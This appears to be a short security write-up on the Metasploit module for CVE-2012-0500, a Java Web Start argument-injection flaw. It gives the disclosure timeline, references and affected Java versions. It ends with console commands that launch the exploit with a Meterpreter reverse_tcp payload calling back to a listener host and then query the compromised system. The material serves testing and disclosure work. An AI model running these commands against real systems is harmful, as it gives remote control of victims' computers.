Timeline :

Vulnerability “ZDI-12-037” reported by Chris Ries to ZDI
Vulnerability reported to the vendor by ZDI the 2011-10-28 for “ZDI-12-037”
Coordinated public release of the vulnerability the 2012-02-22
Metasploit PoC provided the 2012-02-23

PoC provided by :

jduck

Reference(s) :

CVE-2012-0500
OSVDB-79227
ZDI-12-037
TSL20120214-01
Oracle Java SE Critical Patch Update Advisory – February 2012

Affected version(s) :

Oracle Java Development Kit (JDK) 6 Update 30 and prior
Oracle Java Development Kit (JDK) 7 Update 2 and prior
Oracle JavaFX 2.0.2 and prior
Oracle Java Runtime Environment (JRE) 6 Update 30 and prior
Oracle Java Runtime Environment (JRE) 7 Update 2 and prior

Tested on Windows XP Pro SP3 with :

Java 6 Update 30
Internet Explorer 8

Description :

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.

Commands :

use exploit/windows/browser/java_ws_vmargs
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid